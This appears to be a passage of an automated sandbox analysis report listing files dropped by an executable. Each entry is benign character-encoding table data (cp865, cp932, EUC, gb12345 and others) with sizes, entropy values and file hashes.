                                                                                                                                                                                                                              SHA-512:AC56EEB0220826BF8FF6CA52768DB63961AAC46095A2F3EEBA11B5973CC92AF52DFBBE9E85A0DD04CAB8998212FA2599EDD83BAAA7FB2D394E330FF2F7C015DB
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# Encoding file: cp865, single-byte..S..003F 0 1..00..0000000100020003000400050006000700080009000A000B000C000D000E000F..0010001100120013001400150016001700180019001A001B001C001D001E001F..0020002100220023002400250026002700280029002A002B002C002D002E002F..0030003100320033003400350036003700380039003A003B003C003D003E003F..0040004100420043004400450046004700480049004A004B004C004D004E004F..0050005100520053005400550056005700580059005A005B005C005D005E005F..0060006100620063006400650066006700680069006A006B006C006D006E006F..0070007100720073007400750076007700780079007A007B007C007D007E007F..00C700FC00E900E200E400E000E500E700EA00EB00E800EF00EE00EC00C400C5..00C900E600C600F400F600F200FB00F900FF00D600DC00F800A300D820A70192..00E100ED00F300FA00F100D100AA00BA00BF231000AC00BD00BC00A100AB00A4..259125922593250225242561256225562555256325512557255D255C255B2510..25142534252C251C2500253C255E255F255A25542569256625602550256C2567..2568256425652559255825522553256B256A2518250C25882584258C25902580..03B100DF039303C003A303
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):1110
                                                                                                                                                                                                                              Entropy (8bit):3.5038992968715266
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:24:CCHVBUlJvRj7SOVbusZhAMiZyi77qb+SAJlz9aRme3cB18wDyVNZkR:bMlBVnrAMiwMm8YnsB1wZy
                                                                                                                                                                                                                              MD5:FC33B5F773E87696A69E8798446E9772
                                                                                                                                                                                                                              SHA1:4FC5589C1DD88BB8171758BC173A63B3A5687AE5
                                                                                                                                                                                                                              SHA-256:32A45DEBA933C7ED99141535087A4C99BA79802175E3F762ACA6EB941157F85A
                                                                                                                                                                                                                              SHA-512:332D2FEC532192F58F792441E61D675A8692C36BECF768D07F64B8C31561CC1A2DF402625A4719E758A9B59DE4228FFE9F94F067E7DC0D82F9DA2D6500E50304
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# Encoding file: cp866, single-byte..S..003F 0 1..00..0000000100020003000400050006000700080009000A000B000C000D000E000F..0010001100120013001400150016001700180019001A001B001C001D001E001F..0020002100220023002400250026002700280029002A002B002C002D002E002F..0030003100320033003400350036003700380039003A003B003C003D003E003F..0040004100420043004400450046004700480049004A004B004C004D004E004F..0050005100520053005400550056005700580059005A005B005C005D005E005F..0060006100620063006400650066006700680069006A006B006C006D006E006F..0070007100720073007400750076007700780079007A007B007C007D007E007F..0410041104120413041404150416041704180419041A041B041C041D041E041F..0420042104220423042404250426042704280429042A042B042C042D042E042F..0430043104320433043404350436043704380439043A043B043C043D043E043F..259125922593250225242561256225562555256325512557255D255C255B2510..25142534252C251C2500253C255E255F255A25542569256625602550256C2567..2568256425652559255825522553256B256A2518250C25882584258C25902580..0440044104420443044404
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):1110
                                                                                                                                                                                                                              Entropy (8bit):3.5261138894265507
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:24:CtHVBUlJvRj7SOVbusZhAMiZyi77qii+lh2o5+hdVMQFhWgCDrKE:EMlBVnrAMiwMmXY2o5+hdVMQFhWf3f
                                                                                                                                                                                                                              MD5:4A2C66AA630D4AE2BF1E7546DCE2DAE5
                                                                                                                                                                                                                              SHA1:FABB672957D21CA2B4E0EACA5FCE6093BAACF77A
                                                                                                                                                                                                                              SHA-256:AFE6ED6EB5D07C45B6B928A48BC5EF57EFCF61602D36FF9FBDE4A8EA3FA6DF75
                                                                                                                                                                                                                              SHA-512:A548002EB7AF8735DBBBCC9883B44B326F261C02A3C7CE65C373755DD92212A66740112EAE0FC556CAD5B86911709C6DF12167DC5B6AD1E01C6F1EB5AB16DB37
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# Encoding file: cp869, single-byte..S..003F 0 1..00..0000000100020003000400050006000700080009000A000B000C000D000E000F..0010001100120013001400150016001700180019001A001B001C001D001E001F..0020002100220023002400250026002700280029002A002B002C002D002E002F..0030003100320033003400350036003700380039003A003B003C003D003E003F..0040004100420043004400450046004700480049004A004B004C004D004E004F..0050005100520053005400550056005700580059005A005B005C005D005E005F..0060006100620063006400650066006700680069006A006B006C006D006E006F..0070007100720073007400750076007700780079007A007B007C007D007E007F..0080008100820083008400850386008700B700AC00A620182019038820150389..038A03AA038C00930094038E03AB00A9038F00B200B303AC00A303AD03AE03AF..03CA039003CC03CD039103920393039403950396039700BD0398039900AB00BB..25912592259325022524039A039B039C039D256325512557255D039E039F2510..25142534252C251C2500253C03A003A1255A25542569256625602550256C03A3..03A403A503A603A703A803A903B103B203B32518250C2588258403B403B52580..03B603B703B803B903BA03
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):1110
                                                                                                                                                                                                                              Entropy (8bit):3.33737382140564
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:24:CSyHVBUlJvRj7SOVbusZhAMiZyi77qVQEHmEU4AyqU+TWwdd:CMlBVnrAMiwMmWr4AyqUSd
                                                                                                                                                                                                                              MD5:FC8C876B4738236FC71A1AF96E4566D0
                                                                                                                                                                                                                              SHA1:DDFDC3F62D99A6BD705CF0719B50F66449C8808A
                                                                                                                                                                                                                              SHA-256:4F05F31CA026BBFEEEE49ED86504CB060784137A9CFAE0E5954D276E837AB5DE
                                                                                                                                                                                                                              SHA-512:5BF58A810E029840825FFF3318E90415E6F2B7E46032FD428B4971923D41A64C127A6F438E4894E80EC9604CD34F1D47B4F9A02ABAB3E7D6351611811DC1F2B9
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# Encoding file: cp874, single-byte..S..003F 0 1..00..0000000100020003000400050006000700080009000A000B000C000D000E000F..0010001100120013001400150016001700180019001A001B001C001D001E001F..0020002100220023002400250026002700280029002A002B002C002D002E002F..0030003100320033003400350036003700380039003A003B003C003D003E003F..0040004100420043004400450046004700480049004A004B004C004D004E004F..0050005100520053005400550056005700580059005A005B005C005D005E005F..0060006100620063006400650066006700680069006A006B006C006D006E006F..0070007100720073007400750076007700780079007A007B007C007D007E007F..20AC008100820083008420260086008700880089008A008B008C008D008E008F..009020182019201C201D20222013201400980099009A009B009C009D009E009F..00A00E010E020E030E040E050E060E070E080E090E0A0E0B0E0C0E0D0E0E0E0F..0E100E110E120E130E140E150E160E170E180E190E1A0E1B0E1C0E1D0E1E0E1F..0E200E210E220E230E240E250E260E270E280E290E2A0E2B0E2C0E2D0E2E0E2F..0E300E310E320E330E340E350E360E370E380E390E3A00000000000000000E3F..0E400E410E420E430E440E
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):49008
                                                                                                                                                                                                                              Entropy (8bit):3.5144574650895364
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:768:R/RPrUHiJrKWkyY/W2wHiwWnwWOORY+gutSY83+JRS:RVUidzJCurDGSYvW
                                                                                                                                                                                                                              MD5:EF4508C84A025095B183E6BAD67B1ECD
                                                                                                                                                                                                                              SHA1:D12D5381D50D578AA8687671DC542C462A7F490D
                                                                                                                                                                                                                              SHA-256:6D1B512110BEAF2CD1296AC878F51D567848AB4A1CED4F18C72806BB136B3D23
                                                                                                                                                                                                                              SHA-512:E695E7E6F4A11D5E8D62982E26B69B87DB2F1F3D6B6DCCD5F1DF51879F5C4533265CBD7B785E1F2652D8CA3FC913D4F862E7575F67C636314A6E6956FD96E023
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# Encoding file: cp932, multi-byte..M..003F 0 46..00..0000000100020003000400050006000700080009000A000B000C000D000E000F..0010001100120013001400150016001700180019001A001B001C001D001E001F..0020002100220023002400250026002700280029002A002B002C002D002E002F..0030003100320033003400350036003700380039003A003B003C003D003E003F..0040004100420043004400450046004700480049004A004B004C004D004E004F..0050005100520053005400550056005700580059005A005B005C005D005E005F..0060006100620063006400650066006700680069006A006B006C006D006E006F..0070007100720073007400750076007700780079007A007B007C007D007E007F..0080000000000000000000850086000000000000000000000000000000000000..0000000000000000000000000000000000000000000000000000000000000000..0000FF61FF62FF63FF64FF65FF66FF67FF68FF69FF6AFF6BFF6CFF6DFF6EFF6F..FF70FF71FF72FF73FF74FF75FF76FF77FF78FF79FF7AFF7BFF7CFF7DFF7EFF7F..FF80FF81FF82FF83FF84FF85FF86FF87FF88FF89FF8AFF8BFF8CFF8DFF8EFF8F..FF90FF91FF92FF93FF94FF95FF96FF97FF98FF99FF9AFF9BFF9CFF9DFF9EFF9F..0000000000000000000000
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):134671
                                                                                                                                                                                                                              Entropy (8bit):3.5217328918779645
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:1536:+CwDua7D90Jz1aDJmnMfEGniOQdH6prJs3inqlW6/t9Qwf+zCt5:j1WVRpe3rpt9hf+Gt5
                                                                                                                                                                                                                              MD5:CF9CFD6329A4FB6C402052B9417DAC3A
                                                                                                                                                                                                                              SHA1:75CE13FE1E5898D47B67F951C0C228851F1CC04D
                                                                                                                                                                                                                              SHA-256:B6EC2BE0504CA62B9D1B6857F6BAA13FFAC5A567D4432F4EAB98ADC830F5D9C3
                                                                                                                                                                                                                              SHA-512:7E19607EEA5342ECFE92D56DAAE82827DE147AE5AFDA8E9D67FD0970F528902CDE20A8A07CF2F341B926E59BB4FF792872976F1C7C5CD351959A71A8B6A1924A
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# Encoding file: cp936, multi-byte..M..003F 0 127..00..0000000100020003000400050006000700080009000A000B000C000D000E000F..0010001100120013001400150016001700180019001A001B001C001D001E001F..0020002100220023002400250026002700280029002A002B002C002D002E002F..0030003100320033003400350036003700380039003A003B003C003D003E003F..0040004100420043004400450046004700480049004A004B004C004D004E004F..0050005100520053005400550056005700580059005A005B005C005D005E005F..0060006100620063006400650066006700680069006A006B006C006D006E006F..0070007100720073007400750076007700780079007A007B007C007D007E007F..20AC000000000000000000000000000000000000000000000000000000000000..0000000000000000000000000000000000000000000000000000000000000000..0000000000000000000000000000000000000000000000000000000000000000..0000000000000000000000000000000000000000000000000000000000000000..0000000000000000000000000000000000000000000000000000000000000000..0000000000000000000000000000000000000000000000000000000000000000..000000000000000000000
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):132551
                                                                                                                                                                                                                              Entropy (8bit):3.100976362851161
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:1536:2UO8ecy5KnSMsDlOmNpkQ4oQHnTApv+ngLbiyEY:2U/etc/sBRZp//r
                                                                                                                                                                                                                              MD5:03E19A4DE3490A7DC50D04EC1F558835
                                                                                                                                                                                                                              SHA1:9DFECAE08C98109EAA358F5920AED647888F722B
                                                                                                                                                                                                                              SHA-256:477F8B79B67F4A22C963EE65B9B387DBD8E4B8F62D800B0A51D2276580C6ADBB
                                                                                                                                                                                                                              SHA-512:7D6AD30AF75A3AA6332A860C6ABF87BF725EB6B4AF3B37699043A10EF3235471C63D0ECB4D437D5AD9438DF5DA646EB55117A9BB8B55EF6868F71E49035C18B7
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# Encoding file: cp949, multi-byte..M..003F 0 125..00..0000000100020003000400050006000700080009000A000B000C000D000E000F..0010001100120013001400150016001700180019001A001B001C001D001E001F..0020002100220023002400250026002700280029002A002B002C002D002E002F..0030003100320033003400350036003700380039003A003B003C003D003E003F..0040004100420043004400450046004700480049004A004B004C004D004E004F..0050005100520053005400550056005700580059005A005B005C005D005E005F..0060006100620063006400650066006700680069006A006B006C006D006E006F..0070007100720073007400750076007700780079007A007B007C007D007E007F..0080000000000000000000000000000000000000000000000000000000000000..0000000000000000000000000000000000000000000000000000000000000000..0000000000000000000000000000000000000000000000000000000000000000..0000000000000000000000000000000000000000000000000000000000000000..0000000000000000000000000000000000000000000000000000000000000000..0000000000000000000000000000000000000000000000000000000000000000..000000000000000000000
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):93330
                                                                                                                                                                                                                              Entropy (8bit):3.319807723045599
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:768:aAHU3LIkZlmXrd/uQ0ao98ggKSTEvZPHb6qRL5NpiadDp0ZBFR6YR/fW:aVduBGf9PgFMT6q95GDRBfW
                                                                                                                                                                                                                              MD5:1D84B025DAB127F2073947D764D307B6
                                                                                                                                                                                                                              SHA1:4E3D3CBD96D084836F1FE6F2AA497E3FAA463B9B
                                                                                                                                                                                                                              SHA-256:F80E05533D1A1494C32F9412E9AD2D9C11FAF9AE0668A6F9D1FA5CEEDC6870E2
                                                                                                                                                                                                                              SHA-512:188D649F9717F20524AFF47F85C3B23AEC3E7825BF54975285D06C17587D581DC24A3F6A7CAB1703DE7AD5521FE2FE2572DE627A81E6A48049A47BB219ED4AF8
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# Encoding file: cp950, multi-byte..M..003F 0 88..00..0000000100020003000400050006000700080009000A000B000C000D000E000F..0010001100120013001400150016001700180019001A001B001C001D001E001F..0020002100220023002400250026002700280029002A002B002C002D002E002F..0030003100320033003400350036003700380039003A003B003C003D003E003F..0040004100420043004400450046004700480049004A004B004C004D004E004F..0050005100520053005400550056005700580059005A005B005C005D005E005F..0060006100620063006400650066006700680069006A006B006C006D006E006F..0070007100720073007400750076007700780079007A007B007C007D007E007F..0080008100820083008400850086008700880089008A008B008C008D008E008F..0090009100920093009400950096009700980099009A009B009C009D009E009F..0000000000000000000000000000000000000000000000000000000000000000..0000000000000000000000000000000000000000000000000000000000000000..0000000000000000000000000000000000000000000000000000000000000000..0000000000000000000000000000000000000000000000000000000000000000..0000000000000000000000
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):1113
                                                                                                                                                                                                                              Entropy (8bit):3.7780987266961663
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:24:vJMHkUlJvRjmf9RCsUBOdXsCbbNviANpk3m1XFAoE4xSF5HrBPkdn:vKvlA9RCs6CXrViAN51XFA9eSvdPKn
                                                                                                                                                                                                                              MD5:90FE0C57BBC6C2D8A3324DEB7FD45F3D
                                                                                                                                                                                                                              SHA1:06B95BE43E4C859A0F1B01384EDD26500C6C1F9E
                                                                                                                                                                                                                              SHA-256:EB9B262E4D179268E6F017C0D4EF0E7034E31A5B4893595D150640CA1F6A1C45
                                                                                                                                                                                                                              SHA-512:6A5E67D9F3EC6046C42793E1437B8A6E50EBD72D8EC67FEFEB6DAD6FAB6A5B5C74F939363587D5A6529E217AF54FB8A9CF0F768E114DD931C57887451CACE56E
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# Encoding file: dingbats, single-byte..S..003F 1 1..00..0000000100020003000400050006000700080009000A000B000C000D000E000F..0010001100120013001400150016001700180019001A001B001C001D001E001F..00202701270227032704260E2706270727082709261B261E270C270D270E270F..2710271127122713271427152716271727182719271A271B271C271D271E271F..2720272127222723272427252726272726052729272A272B272C272D272E272F..2730273127322733273427352736273727382739273A273B273C273D273E273F..2740274127422743274427452746274727482749274A274B25CF274D25A0274F..27502751275225B225BC25C6275625D727582759275A275B275C275D275E007F..0080008100820083008400850086008700880089008A008B008C008D008E008F..0090009100920093009400950096009700980099009A009B009C009D009E009F..0000276127622763276427652766276726632666266526602460246124622463..2464246524662467246824692776277727782779277A277B277C277D277E277F..2780278127822783278427852786278727882789278A278B278C278D278E278F..2790279127922793279421922194219527982799279A279B279C279D279E279F..27A027A127A227A327A
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):1073
                                                                                                                                                                                                                              Entropy (8bit):3.0039861897954805
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:24:XXBcIhJZDgEoQkNCGz0Jyh9lZk3Vmd2QhZLXPiALV3d:dTcNCJEhfZk3Vzox/iqVN
                                                                                                                                                                                                                              MD5:F7B3771D43BDE6AFF897683BED2FE6AD
                                                                                                                                                                                                                              SHA1:E70C2C0902413536CB6163752D70F3AE4AF6A967
                                                                                                                                                                                                                              SHA-256:165BE658AB7D61FFC3DF1E2F1438C2F9FCEE6808A756316302157F44E6D3ACD7
                                                                                                                                                                                                                              SHA-512:F87DC718EB2DD95237B144FDA090BB636121B9479E492AC94E4F7EBDD88171F070B9E9F6165BDA7B7E2BA2A3E6188B1108D8F91AA5F142CCCFDAD317628DD941
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:S..006F 0 1..00..0000000100020003008500090086007F0087008D008E000B000C000D000E000F..0010001100120013008F000A0008009700180019009C009D001C001D001E001F..0080008100820083008400920017001B00880089008A008B008C000500060007..0090009100160093009400950096000400980099009A009B00140015009E001A..002000A000E200E400E000E100E300E500E700F10060002E003C0028002B007C..002600E900EA00EB00E800ED00EE00EF00EC00DF00210024002A0029003B009F..002D002F00C200C400C000C100C300C500C700D1005E002C0025005F003E003F..00F800C900CA00CB00C800CD00CE00CF00CC00A8003A002300400027003D0022..00D800610062006300640065006600670068006900AB00BB00F000FD00FE00B1..00B0006A006B006C006D006E006F00700071007200AA00BA00E600B800C600A4..00B500AF0073007400750076007700780079007A00A100BF00D000DD00DE00AE..00A200A300A500B700A900A700B600BC00BD00BE00AC005B005C005D00B400D7..00F900410042004300440045004600470048004900AD00F400F600F200F300F5..00A6004A004B004C004D004E004F00500051005200B900FB00FC00DB00FA00FF..00D900F70053005400550056005700580059005A00B200D400D600D200D
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):86971
                                                                                                                                                                                                                              Entropy (8bit):2.3925661740847697
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:768:UHivP+bFFScXEBFhHeUrUFESCeYjN7GC0nYX:I7FFX2nHeUr8ESCDlX
                                                                                                                                                                                                                              MD5:C5AA0D11439E0F7682DAE39445F5DAB4
                                                                                                                                                                                                                              SHA1:73A6D55B894E89A7D4CB1CD3CCFF82665C303D5C
                                                                                                                                                                                                                              SHA-256:1700AF47DC012A48CEC89CF1DFAE6D1D0D2F40ED731EFF6CA55296A055A11C00
                                                                                                                                                                                                                              SHA-512:EEE6058BD214C59BCC11E6DE7265DA2721C119CC9261CFD755A98E270FF74D2D73E3E711AA01A0E3414C46D82E291EF0DF2AD6C65CA477C888426D5A1D2A3BC5
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# Encoding file: euc-cn, multi-byte..M..003F 0 82..00..0000000100020003000400050006000700080009000A000B000C000D000E000F..0010001100120013001400150016001700180019001A001B001C001D001E001F..0020002100220023002400250026002700280029002A002B002C002D002E002F..0030003100320033003400350036003700380039003A003B003C003D003E003F..0040004100420043004400450046004700480049004A004B004C004D004E004F..0050005100520053005400550056005700580059005A005B005C005D005E005F..0060006100620063006400650066006700680069006A006B006C006D006E006F..0070007100720073007400750076007700780079007A007B007C007D007E007F..0080008100820083008400850086008700880089008A008B008C008D008E008F..0090009100920093009400950096009700980099009A009B009C009D009E009F..0000000000000000000000000000000000000000000000000000000000000000..0000000000000000000000000000000000000000000000000000000000000000..0000000000000000000000000000000000000000000000000000000000000000..0000000000000000000000000000000000000000000000000000000000000000..000000000000000000000
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):83890
                                                                                                                                                                                                                              Entropy (8bit):2.350315390677456
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:768:2GhX8nuQ635vlHptHzh0abNQPQA0OMS2HhFV3:2GikvRpMuNQ4P73
                                                                                                                                                                                                                              MD5:F2DE0AE66A4E5DD51CC64B08D3709AAB
                                                                                                                                                                                                                              SHA1:97558A51A6DD6C56FC7A42A4204141A5639021FD
                                                                                                                                                                                                                              SHA-256:A3C916BA16BCAC9FAA5A1CCC62ACA61452D581CD8BA3EE07EC39122C697274C9
                                                                                                                                                                                                                              SHA-512:0EAA90100527FF150D2653D7BB57647D69E592BE53B714DDD867114CFCC71E3A76882772F4FAECE040DF09FA8971D1C22DECC497E589B4CA827A6890497A48D9
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# Encoding file: euc-jp, multi-byte..M..003F 0 79..00..0000000100020003000400050006000700080009000A000B000C000D000E000F..0010001100120013001400150016001700180019001A001B001C001D001E001F..0020002100220023002400250026002700280029002A002B002C002D002E002F..0030003100320033003400350036003700380039003A003B003C003D003E003F..0040004100420043004400450046004700480049004A004B004C004D004E004F..0050005100520053005400550056005700580059005A005B005C005D005E005F..0060006100620063006400650066006700680069006A006B006C006D006E006F..0070007100720073007400750076007700780079007A007B007C007D007E007F..0080008100820083008400850086008700880089008A008B008C008D0000008F..0090009100920093009400950096009700980099009A009B009C009D009E009F..0000000000000000000000000000000000000000000000000000000000000000..0000000000000000000000000000000000000000000000000000000000000000..0000000000000000000000000000000000000000000000000000000000000000..0000000000000000000000000000000000000000000000000000000000000000..000000000000000000000
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):95451
                                                                                                                                                                                                                              Entropy (8bit):2.4080588863614136
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:768:4/vO7UlClqAd8XfpUqv+mCoKRuLbtMjnIxz0DY:4nO4N9fpv+ngLbiyEY
                                                                                                                                                                                                                              MD5:103843B3A57168BD574F6CACC550D439
                                                                                                                                                                                                                              SHA1:982652EA2B0DCFBB55970E019A4EDFBFCFAF9C24
                                                                                                                                                                                                                              SHA-256:5448643398685456A11CBB93AF2321F70B8659E2FFF3CCC534B4D53BD2F38C89
                                                                                                                                                                                                                              SHA-512:27A8DE6F97DB4A96E5D0132692A32A99DAB8A6C98973A0C4E50A219F2D2F364E63D657E5E8478B2706CA33C45C376F55B5BFCC9459E06AEA88BFCD4F0E32525C
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# Encoding file: euc-kr, multi-byte..M..003F 0 90..00..0000000100020003000400050006000700080009000A000B000C000D000E000F..0010001100120013001400150016001700180019001A001B001C001D001E001F..0020002100220023002400250026002700280029002A002B002C002D002E002F..0030003100320033003400350036003700380039003A003B003C003D003E003F..0040004100420043004400450046004700480049004A004B004C004D004E004F..0050005100520053005400550056005700580059005A005B005C005D005E005F..0060006100620063006400650066006700680069006A006B006C006D006E006F..0070007100720073007400750076007700780079007A007B007C007D007E007F..0080008100820083008400850086008700880089008A008B008C008D008E008F..0090009100920093009400950096009700980099009A009B009C009D009E009F..0000000000000000000000000000000000000000000000000000000000000000..0000000000000000000000000000000000000000000000000000000000000000..0000000000000000000000000000000000000000000000000000000000000000..0000000000000000000000000000000000000000000000000000000000000000..000000000000000000000
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):88033
                                                                                                                                                                                                                              Entropy (8bit):2.3790651802316996
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:768:o4Is/C+0IwpRK1CkinIKUyNiNBzxOC4T/:LIsR0/RKckiIgNiDtOxT
                                                                                                                                                                                                                              MD5:1A8E55DEA98B6D5EAC731ED233D3AD7C
                                                                                                                                                                                                                              SHA1:1335FC0FC2AAE7E7F5EC42AC17A4168368B4A64D
                                                                                                                                                                                                                              SHA-256:B4894AEDD2D5B5AE54B6D2840F7C89A88E9308EFD288F179E65936E172EF4B0D
                                                                                                                                                                                                                              SHA-512:9DDCE366BA1196EB9FB913ACFDE8516BC9BB8D51894866D2E7E8CB313DC4D6C6D33C5A9E78142E83594DC423D10DA6F8DE211E69844B939198BC7DB9AED808F0
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# Encoding file: gb12345, double-byte..D..233F 0 83..21..0000000000000000000000000000000000000000000000000000000000000000..0000000000000000000000000000000000000000000000000000000000000000..000030003001300230FB02C902C700A8300330052015FF5E2225202620182019..201C201D3014301530083009300A300B300C300D300E300F3016301730103011..00B100D700F72236222722282211220F222A222922082237221A22A522252220..23122299222B222E2261224C2248223D221D2260226E226F22642265221E2235..22342642264000B0203220332103FF0400A4FFE0FFE1203000A7211626062605..25CB25CF25CE25C725C625A125A025B325B2203B219221902191219330130000..0000000000000000000000000000000000000000000000000000000000000000..0000000000000000000000000000000000000000000000000000000000000000..0000000000000000000000000000000000000000000000000000000000000000..0000000000000000000000000000000000000000000000000000000000000000..0000000000000000000000000000000000000000000000000000000000000000..0000000000000000000000000000000000000000000000000000000000000000..0000000000000000000
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):1111
                                                                                                                                                                                                                              Entropy (8bit):3.270324851474969
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:24:qrmHVBUlJvRj76OVbusZhAMiZyi77qN8VmKfkiJt0RMFS:qSMlZVnrAMiwMmNPYPFS
                                                                                                                                                                                                                              MD5:D06664ACAA478BDEB42B63941109A4E3
                                                                                                                                                                                                                              SHA1:4A6196FCC1BDE988C1A23EAA69745A9979F1AEFF
                                                                                                                                                                                                                              SHA-256:ACD50951F81566C8D823670F9957B2479102EB5AE4CF558453E1D8436A9E31FF
                                                                                                                                                                                                                              SHA-512:CB51A36B851FFDB5C6F9B9D0333EEA6A14CEF3796E0A60530198C16999D64E638047E873333630360299C9126F79CEDDA2D9F169028CED1FC04B1D3C55FFFC5B
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
